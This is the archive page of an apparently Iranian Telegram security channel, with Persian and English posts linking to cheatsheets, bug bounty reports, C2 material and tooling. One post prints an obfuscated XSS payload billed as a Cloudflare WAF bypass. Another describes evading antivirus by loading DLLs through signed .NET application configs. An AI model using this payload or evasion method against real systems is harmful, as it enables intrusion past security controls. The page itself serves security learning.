¡Ya disponible! Investigación de Telegram 2025 — los principales insights del año 
Network Security Channel
Ir al canal en Telegram
⭕️Start Channel From 2017⭕️ ✅ Security Operation Center (SOC) ✅ Bug Bounty ✅ Vulnerability ✅ Pentest ✅ Hardening ✅ Linux ✅ Reasearch ✅ Security Network ✅ Security Researcher ✅ DevSecOps ✅ Blue Team ✅ Red Team
Mostrar más2 811
Suscriptores
+1124 horas
+217 días
+6230 días
Archivo de publicaciones
A very complete collection of cheatsheet for #blue_team operations
#cheatsheet
Dm for copyright violations
@Engineer_Computer
Top Event codes
Dm for copyright violations
#book #event_code
@Engineer_Computer
#NIST
Cybersecurity for satellites
#space #satellite
@Engineer_Computer
#book
Top C&C Methods
#C_and_C #C2
Dm for copyright violations
@Engineer_Computer
⭕️ افزونه ی مرورگر AI nuclei
قبلا سرویس Nuclei AI رو در کانال معرفی کرده بودیم.
حال، افزونه Nuclei AI میتواند با انتخاب کردن متن CVE های جدید در توییتر (یا صفحات وب دیگر) از سرویس Nuclei AI استفاده کند و تمپلیت nuclei مورد نظر را بسازد.
اپشن های این افزونه عبارتند از:
- تبدیل گزارش باگ بانتی HackerOne به تمپلیت Nuclei ( همچنین پشتیبانی برای پلتفرم های دیگر مانند BugCrowd / Intigriti / Synack نیز اضافه میشود )
- تبدیل اکسپلویت های ExploitDB به تمپلیت Nuclei
لینک افزونه:
🔗 https://github.com/projectdiscovery/nuclei-ai-extension
#nuclei #automation
@Engineer_Computer
⭕️ یکی از راه های دور زدن execution policy و AV ها استفاده از فایل های SIGN شده توسط کمپانی های معتبر است.
در لینک زیر یک لیست مناسب از Net Application. های مورد تایید Microsoft جمع آوری شده ، که ما میتوانیم با استفاده از فایل های Config. فایل های DLL را فراخوانی کنیم به طوری که از قبل مورد تایید قرار گرفته باشد.
https://github.com/Mr-Un1k0d3r/.NetConfigLoader
#RedTeam #MalDev
@Engineer_Computer
RCE of Burp Scanner / Crawler via Clickjacking
https://hackerone.com/reports/1274695
@Engineer_Computer
🗒 3 tricks to bypass Cloudflare WAF in file upload
https://medium.com/numen-cyber-labs/3-tricks-to-bypass-cloudflare-waf-in-file-upload-9abb83530cfc
@Engineer_Computer
🗒 Telegram bug bounties XSS, privacy issues, official bot exploitation
https://davtur19.medium.com/telegram-bug-bounties-xss-privacy-issues-official-bot-exploitation-and-more-5277fa78435
@Engineer_Computer
🗒 Cloudflare bypass WAF
Payload:
<inpuT autofocus oNFocus="setTimeout(function() { /*\*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\*/ }, 5000);"></inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT;
@Engineer_Computer
سوء استفاده از ابزار سرویس سرتیفیکیت اکتیو
https://www.blackhillsinfosec.com/abusing-active-directory-certificate-services-part-3/
@Engineer_Computer
